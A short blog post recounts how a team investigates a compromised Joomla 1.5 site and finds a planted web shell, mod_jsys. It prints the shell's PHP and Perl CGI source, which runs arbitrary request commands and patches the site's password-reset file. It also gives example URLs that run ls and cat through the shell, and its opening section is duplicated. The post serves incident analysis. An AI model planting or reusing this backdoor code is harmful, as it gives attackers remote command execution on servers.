Joomla Bug Day at OSCC MAMPU
We spend the whole morning discussing about the Joomla! 1.5.x (5 below) bug. You can read Indhran blog about how we reset the admin password.
Rescue Your Joomla 15x Sites
Related blog post
Then Abdullah our Hightech Rojak Blogger found something in the Apache log.
This command
http://oscc.lan/modules/mod_jsys/mod_jsys.php?cmd=ls
When we tried it using web brower like Mozilla Firefox. We can list all the files in the directory. I used that link to find the location of the mod_lsys.php file and used cat to view the file. Simply from the Mozilla Firefox.
http://oscc.lan/modules/mod_jsys/mod_jsys.php?cmd=cat%20/var/www/html/cioconf/modules/mod_jsys/mod_jsys.php
Rescue Your Joomla 15x Sites
Related blog post
Then Abdullah our Hightech Rojak Blogger found something in the Apache log.
This command
http://oscc.lan/modules/mod_jsys/mod_jsys.php?cmd=ls
When we tried it using web brower like Mozilla Firefox. We can list all the files in the directory. I used that link to find the location of the mod_lsys.php file and used cat to view the file. Simply from the Mozilla Firefox.
http://oscc.lan/modules/mod_jsys/mod_jsys.php?cmd=cat%20/var/www/html/cioconf/modules/mod_jsys/mod_jsys.php
--------- mod_jsys.php content
Welcome Welcome
chmod("../../modules/mod_jsys/mod_jsys.cgi", 0755);
if(!empty($_REQUEST['cmd'])) {
$buf = shell_exec($_REQUEST['cmd']);
$buf = str_replace("\n", "
\n", $buf);
echo $buf;
}
if(!empty($_REQUEST['patch'])) {
$fd = fopen("../../components/com_user/models/reset.php", "r");
$fd2 = fopen("../../tmp/p", "w");
if(!$fd) {
echo "Unable to patch";
exit;
}
while($buf = fgets($fd)) {
if(!strpos($buf, "block = 0 AND activation = '.\$db->Quote(")) {
fwrite($fd2, $buf);
}
else {
fwrite($fd2, 'if($db->Quote($token) == "\'\'") {
die("FUCK OFF RETARD");
}'."\n");
fwrite($fd2, ' $db->setQuery(\'SELECT id FROM #__users WHERE block = 0 AND activation = \'.$db->Quote($token));');
}
}
fclose($fd2);
$res = rename("../../tmp/p", "../../components/com_user/models/reset.php");
if($res) {
echo "Patched";
}
else {
echo "Patch failed, unable to copy file";
system("rm -f ../../tmp/p");
}
}
?>
---- mod_jsys.cgi content
#!/usr/bin/perl
print "Content-type: text/html\r\n\r\n";
print "Welcome\n";
@cmd = split(/=/, $ENV{'QUERY_STRING'});
$cmd[1] =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
$cmd = `$cmd[1]`;
$cmd =~ s/\n/\n/g;
print $cmd;